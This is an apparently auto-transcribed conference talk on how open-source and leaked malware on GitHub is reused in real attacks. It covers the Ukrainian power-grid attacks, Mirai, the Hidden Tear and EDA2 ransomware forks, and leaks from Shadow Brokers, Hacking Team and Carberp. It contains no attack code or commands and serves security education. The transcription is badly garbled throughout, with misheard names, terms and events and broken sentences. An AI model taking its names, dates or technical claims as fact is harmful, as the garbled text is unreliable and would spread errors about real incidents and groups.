Sharing is not caring: Proliferation of GitHub code in real attacks

so thanks come the talks lunch is coming up quite soon so pretty being here my name is chris doumitt some of you might know me from iPods are called otx or another project called threat crowd most of you probably won't know me I won't bother with a bio bad to say that I got into the industry thanks to the cybersecurity challenge so I saw I've got a booth here so anyone's looking to get into it it's a pretty good start the talk today is an open-source malware I thought would be a nice topic given the overall b-sides thing is sharing is caring so kind of sit there had it all fits together an open-source malla

objects been like any other software it gets abused so it's not unique but the same time though some trends here we seem to be growing in the last couple of years so I'm going to talk about that through a couple of stories and if you saw the previous talk that's behind should always talk to a story so hopefully I'll be on point who's the first one I forgot to turn it on this is the first one okay anyone want to guess what this media clip is about now so this is about the December 2015 attacks against me cranium power stations so the time made quite a lot of news about 250,000 people were left without power on Christmas Eve so that

kind of sucked and the way the attackers did it was pretty interesting they actually simply stole a bunch of credentials through quite a long campaign and then they remotely connected in using stolen VPN credentials to discard the consoles and they just turned off some circuit breakers I guess I'm making it sound easier there's a whole nother stuff behind that that was quite a damaging attack it's a mr. Timothy green that just means don't stick this on the Internet this slide here there's the interesting attacker quite damaging one the way that these guys set up the attack is kind of all about how these guys normally operate so they're pretty typical example of a medium capability

group and that's where there's been quite a lot of growth recently or they've got coincidences reusing some open source malware so they've got some kind of funding or capability they've got from their own exploits so here you can see couple of CDs once the PowerPoint are delivering their malware or black NGO that another one there it's for scar the console so they can remote the connection General Electric stuff without sin skating they've also got some of their own Mac Pro droppers which are okay and then the malware they use most of the time it's called black energy and black hands you could spit in any of these categories really so originally two years ago you could buy

about 700 bucks including the source code as using some DDoS attacks against some Georgia during a certain conflict and then there's a second version we've got better that was sold again and then these guys got their own custom version it's a little bit smaller so they've got some kind of commercial stuff they use some of their own stuff they used to and then kill discs they also white disk just to make things a little more difficult so during the Ukraine attacks they they wiped a bunch of arm valve chairs that meant thing reset passwords too just to make sure the operators couldn't get things back up and running again also wipe discard a console in one

case because running Windows XP and they use commercial stuff like any good attacker they'll go around the network using the RDP and TeamViewer on some networks that will end in and then the reason I'm talking about them obviously is used open source too so use whatever kind of tools they need the job so we've got reader or we do I'm not trying to pronounce that after doing TCP over HTTP so on a type firewall they can still get a lot of traffic through they've got a web show they use just rip straight off of github they got dropped there which is an SSH server and then the guard ESC fix which is less and run unsigned drivers and

Windows so in this case they're doing that for their main Malheur of which jean which needs drivers so these attacks weren't unprecedented the DHS and the u.s. they warned about this particular group of status codes that were a couple of years ago when it's all them browsing around and stuff in the US about six months before these attacks in 2015 on the night of the Ukrainian elections they took out some summer TV stations just ran disrupt things a little bit so interesting guys and assume that they're in the one hand pretty good the other hand they use whatever they need to be gone so a couple of weeks later in January after these attacks in Christmas they came

back again they're talking about the same people some other people too and ESET picked up these attacks but this time rather than using the black ng malware which they've been using last couple years using G cap which is quite a nice backdoor off ticket half it uses Gmail for command control so written Python it's pretty solid piece of kit and I guess the reason they used it was because they're so associated with other piece of malware all the mountains change baby was still delivering in the same way though so it's also kind of obvious who was doing it and the guy that wrote this arm I'm sure a lot of you will know you write does some great

tools but in this case a little bit valve set that is to always abused to take out some power stations well so for later attacks so this is a pretty extreme example arm so we but careful about the slider Mabus before some of the recent events this is the kind of thing that obviously can happen if your leisure code to anyone to use obviously you can't control who's me using a software at that point this guy's an idiot arm he makes YouTube videos like you all have seen where you can use ends a rat some other free tools hack into people is that this guy tries to line up some other organizations and yet you can't really control huisman

using a software once you give it away for free interestingly enough he had this on youtubers first but they took it down straight away and on Facebook and they took a dance right away but that's been sitting it into the archive for two years and they're a really good charity that basically back up the internet so they're very busy they've got a lot of boosts complaints but if you try and control the information that was going to end up somewhere in this case with some of them have the resources tapers down even after they received abuse complaints the story continues this group of attackers they're called sam worm i didn't mention them before they were soon again december again this

time last december this time look they weren't using the open-source backdoor gee cat they using something that was kind of inspired by it there's amended to use their own version and that uses telegram and telegram instead for that command control so again pretty hard to detect those are upgraded from the rest of their kit to so using less of the open source stuff now they're using their own tools and bounced through networks and get lost firewalls and that's something that's not all that uncommon so there's really interesting group of attackers called Turla they were first seen in the 1990s cycle US government and back then their talk it was just a from frack so they

just listed source code from those kind of ASCII designs I think Frank still going that is what they talk over is in the 90s since then they've built their own platform they only use their own stuff now and now they're very good and as a report out yesterday on how they're using Britney Spears Instagram account and they're leaving little messes on her account and that's how they were doing their command control these days so blame Britney if you get hacked it wasn't upgraded their kill this stuff to now if they destroy your files they also leave you this nice kind of ransomware style message based off of mr. robot and there wasn't so much detail on this but

apparently they tend to be seen again this Christmas the attacks weren't so bad so maybe some lessons were learned samurai and everyone here knows Mariah really well obviously Internet of Things bottner affects things like webcams and rumors all around the world so the guy that wrote it he took out Brian Krebs his website with a massive DDoS attack I think some people said there's one of the biggest of the time some other stuff too probably doing that it obviously gets quite a lot of attention maybe more than he was expecting so after that he released the code open source for anyone to use maybe to try and get the heat off his back you can

the muddy the attribution in the water thereby everyone running your code and people not only run their own botnets because he gave a really nice user guide and how to set us up be able to improve that they added some extra fun abilities in there and talk talk you are always obviously having some issues they want to be with a bunch of rules compromise in these attacks obviously still going times of wanna cry botnets out there interesting enough to there's another worm that's kind of inspired by a rival team which arm Rahim I'm about to pronounce it there's semantic route up and they took the way the Mirai worked and they improved it's a far better

written piece of kit there's not written and go over for one thing and it goes around patching these vulnerabilities not the goes not not great so some of those are smiling at me there so this is the third story I think this is probably the most interesting one and turns all the ups and downs of it and you might have heard of some bit to this story it's about a piece of Merit or didn't air which is some open source ransomware which is release time to get half a couple years ago now being seeing in the wild quite a lot but I haven't seen all the ups and downs covered in one single place here and there are a lot of them

was written by this guy I think you pronounce his name Birds kouf but if anyone can correct me please let me know what is here in the audience respond let me know yeah he's just University student at the time he was studying info sex he thought was getting name out there by writing a piece of kit and giving away for free which is a fair enough thing to do he's got sense of humor you can see he's talking about asking for cookies and kebabs as part of the ransomware mode which is kind of funny and the original version doesn't actually encrypt all your files I they got to change them to get it working so

you said you wrote this as an educational tool so vendors I guess people like me could learn how to detect around to my better we already have enough around tumor samples before we don't need to be askin saw stuff but I mean that's why they did it I saw an interview with him where he was happy to talk about it and you said actually he wrote it to impress a girl which maybe is another reason why when the rites and open source ransomware apparently didn't work so he said but the second version of this he tried again was called with EDA named ask the girl he likes so I know maybe keep trying but yeah I think I hope it works

out for him though and but yeah I guess that's not the reason and the final reason was that he also maybe was kind of a honeypot so the idea is that he wrote this potentially bad piece of code with some crypto flaws in there so good we could get there fast back after around to my encrypted so maybe that's a valid reason it got quite a lot of attention so it was picked up and read it quite fast to be talking about it one guy suggested maybe he's add a backdoor which is what this song Fork suggested he rejected that one at that time and also pointed out so much crypto flaws so he's using a 32-bit arm interested to

generate around the key from that means correct me wrong I think about two billion values in modern modern computer depending on how it's done that could be brute forcible also based on the system time of when this thing's run so potentially you might think about some issues there so yeah this is the first time I'm seeing the wild I think and this trend might have picked this up you visited website in Paraguay down there is a flash update or whatever it was this would be on your computer screen it's good source and it actually I'm able to get these people as far as back if I'm getting copper the malware anchor we did send them a copy the malware he didn't

do break his own crypto perhaps using some of the suggestions that other people had given him on reddit the way he did it was he looks to some of the first stars were encrypted and the base is that he goes just some time and then this different time isn't be exactly the Cummings that the password that was used in privileged stars with but it's more or less about that time so then he brute forces either side that time you can see here about 45,000 go they took him to get that which is obviously pretty quick to guess so it did magic 8-bit as far back so you know some kudos there and this was actually inspired by

bitdefender who cracked another piece of ransomware called linux included or using the same mechanism they'd made a same mistakes there but in the case of linux encoder the equipped so so bad the the bad guys accidentally encrypted your files multiple times and not for i'm rounds just keeps on running yeah so you can't get your files back even if you either crack their code because it's gone or if you pay them he's doing get afar's back so that kind of sucks so yeah this is either to the improved version he wrote some named after someone and gone on most of those Krypton's impatient flaws so he taken some advice and proved it it's obviously a little bit dodgy depending on the

reasons why you're writing you know a piece of code like this again it didn't take long for this to see in the wild so let's say you going to play Far Cry and I can see why you might it looks like farmers a guy with antlers and all that kind of thing complain if it does look good now but it's going to cost you 39 pounds and a nice line pan to the biome steam that's my chest a couple days ago there's quite a lot of money so the obvious thing you can do is going to Google for a crack you find this video of these two lovely people going to give you that perhaps

because they play firefighter 3 which is just great Google always make sure that YouTube ranks well hence why this stuff ends up there oh no they don't give it a crap a far cry of course this is an either to barring the ransomware which assesses a ton of people and the message you get when you're infected this is pretty annoying this guy said we're never bear to find me police will never find me and then he equates the kind of crypto abilities our best buy with the NSA for they must say no those guys and get your files back to your screws so to the rescue again the ash did magical as far as that this time you taking the advice

I was given read it he added the back door so even though the crypto have been fixed you can login to the man control server pick up those keys and then give them back to everyone so this was shared on the bleeping computer forums incidentally I got a couple screenshots immensely thanks to you via the computer so that was nice of him although I think in the UK actually the computer misuse that might not let you hack into the bad guys but I don't know obviously didn't take long for what other people thought his code on github that's what we did because I'm getting off you fork and you improve it so this guy here he thought

they'd just be embarrassed by his bad code improved it he fixed a lot of those those mistakes he left in there and the reason that he made it was to help law enforcement understand what ransom where's work like so who if anyone here is from law enforcement you can consent this guy whose handlers empanel for giving away this more improved around somewhere that doesn't have this brought him interesting enough that he missed the back door even though Evan was talking about at the time someone else went out to him and he removed the back door so you can no longer login and get the keys back obviously it didn't take long before this see in the wild so

let's see when I play Minecraft it looks like a really fun game is loading and get craft very nice but oh no it's all this malware so this is ransomware based off Dalek which is itself a variant of either to which itself is improved version hidden tear so I think this is laughing my ass off at use or the Marxist either way it's yeah I'm not sure other way if another piece of renewing malware I think pretty much the last week systolic was taken down off the github I think the guy that wrote it maybe had a change of heart haven't seen it using the wild but again it's still on github though because obviously it was locked and other made

identical copies or they've improved it so there's a github repo we can still get it from I was also surprised I was looking into this and who wrote this I found some video interviews with the author it turns out he's a 13 year old Bitcoin developer from India so at that point my view of him changed a little bit arm I mean I think maybe releasing open-source rat summer I don't think it's great idea I wouldn't do it but the same time I'm sure a lot that has done dumb stuff when we were 13 talking which that line the bottom that's me when I was his age I wrote a UNIX password cracker in Perl which kind of shows my

age that's the disclaimer on there is terrible though EBIT remember on it I think it cracks like one password a second so no one's going to use it but you know the point here is that over the stupid stuff I did when I was 17 that's still out there about 17 years ago my stability in still out there they want something's out there you can't put the genie back in the bag this happened yesterday so about this kids that good to me because it's quite tough golf to talk a 14 year old was arrested in Japan for ransom ransomware and then making it read about online a minor in the article a couple of things stood out for one thing this

is apparently Japan's first arrest of somewhere someone that rogue ransomware also this kids in actually deployed in the world it it says that this guy's didn't actually infect anyone could just go wear the coat and said the hundred people downloaded it so I feel a bit bad for this guy again I think I wasn't a great idea to him to write this ransom and make it available but you know it looks like it infects anyone so this is another either two variants so it's clear that the guy are showing earlier this was his second one to impress that girl see if someone made another variant of this using the wild could magic another annoying ransom I know but this

time the the story took a bit of a turn for the worse so the good guys took down the server from which all these keys were being backup from and also where all the erratum has been served from and that's a great thing to be stopping additional infections with stopping the bad guy man to make some more money problem with that is though at that point but who can't log in and then download all those old keys I mean there's not a bit of online anymore he can't just hack in and get people's data back so that sucked and then people pretty upset about this there's a guide post on bleeping computer saying hey I lost these photos

and my kids can help me and I saying no I'm sorry but I mean all those foes backed up 10 years you should have backed them up but the ransomware author actually of this magic Varian actually went on the forum and said I have made a backup of these keys I can probably get your files back but he had a condition and that condition was the earth - I had to take down both the ITO - and the hidden tear source code so he's kind of blackmailing him he also asked some money - and if you look at the discussion it gets pretty aggressive as a critical dimension to it who's Turkish this guy the Randleman author is Russian

they didn't get along very well say so the thief but he did agree in the end because you wanted those guys to get their files back so it could did take that into an either - and the original repository is now just show this so the disclaimer and the logo he recently upgraded the logo for either - though arm so I guess the branding still going there and he wrote a blog about his whole experiences and the whole ups and downs of this I'm saying that I'm sorry I fell this time is pretty much how it sighs it off I did actually contact him as well he read my message didn't get back to me

but he's spoken about copper these things then not all the bits that computers himself so and guessing's happy to share his stories about all the ups and downs here obviously as I mentioned earlier though once your code is out there is out there you can't get that back in the bottle so that all these different folks here so you can see here there's a ton of arm in Terry ins just identical clones up on github you can also see here there are some improved versions as well someone's ported hidden tear to C++ which i think is really weird because there isn't hidden tear is a couple of hundred lines of vbscript on that it's not very good if you can write C++

you can probably write your own ransomware the other reports improvements the main version doesn't cookbook files by default he's supposed to do so yeah it's all there and it is back up on the committee stories too so the codes are out there and now everyone is seeing into some wild so I picked these screens up really quickly two credits to a couple good at the end also since the sandbox reports I ran through so you can see here that is Santa Claus smoking and join who has encrypted your computer not very nice man are my naughty list there's ticket to around somewhere this this I'm told you not to downloads random [ __ ] off the internet I'm given

that you've just been infected you probably know that now anyway there's loads here's some more variants I could have put down hundreds of pictures but they're twin bed space that ones mr. robot picture this one's great this one says that arm it's not Microsoft Windows support then later said it is Microsoft Windows support you've been infected with Zeus virus please call us so this is actually a bunch of tech support scammers who normally they throw not people and try and get in to turn them back and take into all the computer or they just flash up those banner ads saying you're infected now I'm moving to use hidden tear see it all these variants by the

way of the reason I'm showing is because we're all either hidden terror either two variants that's only nominal longer works though this one does have to find a later version so if anyone wants to cool them you Brewin check how much the cost of throwing that but there you go I mean most of these slides will be available online later this one looks terrible but it plays the Harry Potter theme too which is kind of cool when you're infected again credited weeping computer this one this one you can't really see on this screen are it just deletes all your files still based on the ransom of hidden tear but it just dumps the key doesn't you send it off so

that no we're getting files back someone's is not very nice this one looks a little bit more familiar maybe anyone recognize what this kind of looks like yes yes yeah yeah so these guys are impersonating wanna cry it came at the same time it's light as insects around copy other insects you know look more dangerous whatever I don't know how successful it was I think they call it dark cry this one got a lot of attention so a few of you might have seen this one rent somewhere this is based on I think it's hidden terror I'll neither - so - get your far back you have to play this anime game and get to an insanely high level before

they'll give you a fart back which it's brilliant so if you look at the thing here you have to get northing civilian school it sounds quite high on lunatic level so that's pretty tough the guy that wrote this felt kinda bad about it he released a crack which was an sitting memory and then tricked us into thinking you've got two nor point two billion on lunatic level so you can get your files back this one doesn't actually ask the money ah it's kind of nice I guess it gives you the key phrase back straightaway so the idea here is trying to educate about ransomware by infecting with ransomware this one's for being a scariest one this

is ransomware as a service so for one hundred and seventy-five dollars you can buy this hidden tear variant and they'll start up a service for you they'll set up because it's game for you but they've always kind of infrastructure that kind of thing so you don't really need to know much to duel if you're running this and $125 we're really cheaply buying into the low-end criminal game and this is another one those kind of growth areas where there's a lot of this arm because open source stuff seemed to be being used now and that's scary if it's once you made 135 dollars so it's maybe a first victim but you've infected I mean you've made your money back you

can reinvest so you can buy tile and exploit kill or you know improve other stuff so yeah that's pretty while we're seeing a lot more variants like this this is a really good map of route to my family's semi prominent ones by f-secure this is over time going forward or grouped by month so I was going to arm a little icon for every kid enterin either - variant but taking really long time so if you just take my word for it when I was looking to the first couple of months it was a bit under one in five simply based on these so quite a lot but this obviously does not take in the count

just what the distribution is so it's under locky and that really big piece of ransomware ever missing has been dispute in the same way as dry debt that would in fact the millions of people whereas some of these really affected a few people these are numbers from Trend Micro they've been looking at himself quite a bit so over month just how many from families they've seen and it's in.net obviously the source codes and lines pretty easy to fall so if it's only goes up to March but I was looking in May and I'm pleased sure that number would have jumped up quite a bit disarmed this has been a growing problem that's not going back down I'm not sure

why does that drop with a Christmas but I guess ransomware developers maybe take some time off so I always like reading these messages about what are the kind of caveat summers github repos bhai should use it so hidden tere says it's may only be used for educational purposes obviously that's not what happened and I have no legal background but as far as I'm aware that means nothing putting that on your repository saying please don't be evil with this it probably just means you know you're doing some little bit sketchy maybe and you can walk hoping that nothing will happen I know that because that's what I used to disclaim on source code that I published as a teenager classwork

records I mean I pass the crack is not as bad around somewhere but I still felt a little bit worried about it so I'd stick this on it open-source license again not a lawyer I'm told it will fast smarter than me that you're not allowed to do take usage with the standard open-source licenses so you can't as part of that life and say this cannot be used for evil that is not allowed in the way that their license works not their be enforceable anyway and in bassin are or vaasana' and i pronounce that but that arms free that covers some cyber stuff i was in use quite a lot again i don't really know it but could be

smarter than me are arrests and stuff saying that it does not apply to open source explicitly in the definitions there but until you publish the code apparently can so just to end a bit on hidden turnovers or ransomware this is a poll by two SEC's probably our best known as malware Tech's best mate so he asked do you think I'm the paraphrase over here do you think that github should be hosting open-source ransomware so for those that have got some energy arm when putting your hand up if you think github should not host open-source ransomware people and handle if you think it hub should host should be allowed to so I think here it's about seventy five percent you

would think that github should be hosting github was around that kind of thing I'm kind of in the middle I mean despite actually doing a talk in this I don't really know myself my views bounced around between the both of them so this last section is on leak source code so technically leak source code no stuff that's been stolen and stuck on github or wherever it's not open source I thought talked about it it's quite topical and also because if you're an attacker and you'll be using some code you don't really care about the license if someone hasn't given you permission to use this backdoor against someone I mean you're hacking them anyway not can

care about the licensing so obviously shadow brokers is rather famous example it's allegedly a bunch of stuff in the NSA entire platforms exploits documentation many many millions of pounds worth of stuff was published here it was allegedly done by some Russian hackers and yeah there's loads it up here but when it's first copied over onto github it was taken down it wasn't taken down because of the exploits it was because they had an oxygen message on there from the shadow brokers asking for Bitcoin donations and you're not allowed to illicit the money for stolen stuff on github that is against the rules so they've actually got a really hard job I feel forget hub I'm not criticizing them

they got to choose the line somewhere and that's where they they just throw it you also can't host compiled malware so you cannot just stick like NJ rats or XE on a github repo and that were downloaded that's not okay are be can host scripts which can be X through that is so when I used to into response remembers one job where the attackers kept a straight off github powershell scripts and password and executing it among really leet command-line things so download and execute off github and on the network level without asking pretty tribute exactly because we're just seeing that excel termination connection to github on the host boat is not that hard thankfully and other stuff too so

someone uploaded the list of vulnerable websites that was taken down from github then they change the mind go back up again we've got they've got a hard choice you know allows you to github the command control that is against the rules too so you can't be putting message on here's Jim coming in setting people fire it so the group of attackers that were doing that but a lot of people have but one of them had a part-time job as a pig farmer and trend did it's really nice arm piece they looked into him and his profile picture on some some forums is him in bed with a pig I have that photo in the deleted slide section

so I finished early I can show that anyone want to see a a very good actually attacker that likes pigs so wanna cry is obviously very topical to how to find some kinda way of speaking missing the talk thankfully there was a pretty good way if you're doing like a drinking game with passwords this would be a good one to drink to so the shadow brokers exploits one of which obviously a ton of blue is used in one a crime to spread around smb1 connections that came out on April so there were some heads off as we come out before that but one a probs didn't come out till about another month and BAE did

really good analysis anything the month of a reddit so we haven't read it's really worth checking out and make sure it wasn't the original vanilla shadow brokers export but they were using just straight taken they were using a far easier to use well packaged up version that was published open-source onto github just before one a cry came out so they took advantage of that cement pack start nicely they also put into Metasploit as well as parlors process so I don't know maybe they would have made the worm anyway are maybe taking a bit longer at some point this is going to happen obviously we have a really good exploit is going to end up nice use the

masculine so I saw the division automatically talking about how who's very happy but in one case there is a exports in the wild and the very same day the magic get into Metasploit I'm Alice are you just walking about how fast community can do to get these tools out there and I think metaphor overall is a very good thing I think the kind of debates people may were having years ago as Dom people will agree that it makes the job easier but in the case of having their foot center that quick I don't really necessarily help from a defensive side I think more we're saying that it was great for vendors could test their detection by

having a mess voice but that has a security vendor we really have you could access the most experts there obviously those programs the stuff gets shared ideally as quickly as possible I'm not complaining but I'm not saying that it helps the defensive either it's always nice to see what goes around comes around so if the shadow brokers the guys leaking those NSA experts give me anyone's probably these guys France pair also known as apt 28 of soccer ki they're really pushed so these guys are hacking the tens of thousand people they're the ones that hit the DNC in the US elections and more recently the French elections they've been talking natives ten years and then putting more

and more people every year they are good but it also another example when there's going to meet in capability groups that need to do whatever they can so yeah these guys make a ton of mistakes in this case the left open the command control server anyone can pick up arms server side their malware so I think that the main I remember it was a transition male comm I think it was hosted on first and people looking for a long time also on the kind of defensive side of sharing is caring Google wrote a paper on this piece of malware it was being shared around people for a long time there was a teal gamba which means it should be on the

internet for example in the endodermis published it and then that probably means that Google aren't going to be so willing to share information these kind of tasks around the industry so much summer happens so that's the other side of sharing is caring there's a whole debate obviously on the defensive side how much does information be shared and how do you control that and the company that I work for we we arm which one prove how we do that a lot because yeah I won't go into my work but yeah it's a hard problem so hacking team again I think everyone here has heard of hacking team they are a somewhat controversial company our self surveillance software so

someone stuff they do is they sell arm this kind of kit to law enforcement to do counterterrorism which I think most would say is quite good but it also sell this kind of kick to dictatorships to hack into their physical opponents and journalists if some people say it's bad so someone got rather set about this and they stole this stuff and they suck on github so you can now download this straight off I think I'm doing caves time so far so yeah anyone can get this now and this is an entire platform as well so again massive weak part this to where exports as well so as part of this dump yeah there are two exports in particular

shared and shadows have the really nice analysis of how these are shared between different groups of attackers so you look at Chinese kind of targeted attacks it looks like there's one central development shop which then shares the code they build with other people so this central development shop course master as some people calling them they would build you miss these exploits make them easier to use than hand loss with other related groups once a PwC we're seeing similar stuff with a web exploit framework with scam box we're seeing so the guys that hit our boss personnel management in the US and all those health care companies they were using some of this kit and in other some

people of deceit in Tibet they were using it again one central place and that's how that code is shared so cover again towards the end now it's not special some criminal stuff so this guy's having a really bad day he's one of the guys who was leading Carver which is piece of banking now it which is really big and popular a few years ago there made many many millions of pounds eventually they were arrested they made the mistake of typing Russian banks even though the ringleaders with based in Moscow so yeah not a good idea again this time I can show the video it later shows this guy as pads being arrested by the FSB not very happy yeah and it was

robbed about 20 25 people working most remotely paid cata brand each to build extensions to say web inject this particular Bank affecting that West whatever customers that kind of thing all together a decent serious piece of kit and these office does arrested the code got leaked and the rave got leaked was the same as used to be skin as you spank them out malware how that code got out when the arrests of people started selling it to still had access to the codes miss you forty thousand dollars which is pretty good deals but quite serious bit of kit then it drops and drops and drops as normal people shared it as enter it's freely available and now anyone can use

it everyone is using it so obviously with tons of banking malware that still uses Carper also still users use given that code leaked to Suffolk your fancy bearer mention a minute ago there's kind of Russian dudes they're using their code and why not they haven't got time to write all their own software all the time and every different variation when stuff gets picked up another big leak that came out recently was volt seven by WikiLeaks allegedly that the CIA is talking now so all these kits are out there and again that involved entire platforms and all this stuff and apparently they were using Carver so there are saving taxpayer money library using some public available code which

is great they're not using all the code just some bits and they carefully vetted it for vulnerabilities which is quite a good idea when it's just a bunch of guys working remotely / to ground building this stuff so just the endless often a more positive note is there an end is there an upside to all this or this kind of reuse of of malware and stuffing open sourced we're just coming back the hidden tear I thought this quote was quite nice of Twitter so the zoo spanking now of is available now everywhere so much now is based off abuse that people don't want to buy that more because it gets it's headed quite easily by particular AV vendors for one

thing there's a new text which most of those variations share go pick that up but tons of other abilities people are good at picking up these variants the same we didn't air so it's not a hard piece of matter to become even ransom a generic they can be detected quite easily you can pack an obfuscator still not that easy - turns out carb does have a back door well it's got vulnerabilities I got tons of them Ashley if you ever take a look at this oversized code it's horrible PHP there's loads of unchecked stuff going on and didn't a long before I think this is daya little and Gotham silent they found some backdoors and then what they

did upon the ability is what they did was they went around attacking car buff service and here's some stuff they found some of the bad guys stuff so his bunch of different dealer here's it some telemetry around the world of the victims connecting to one server it was a family with stuffy expect so signs forms and banks that kind of thing loads of stuff they pigs out there and I was looking NJ rat are the source code there looks pretty bad so then wants to attack another these open source things no one sounded ramen goods are there yeah but someone better than me I'm terrible at exploit death but someone gives be precise and stuff

there so finally I want to thank all the people who slide well screenshots I Nick the works from sandbox reports are in particular to these people and if I miss them and often sorry about that so that's it for me if there are any questions then are the creative onto them [Applause] [Applause]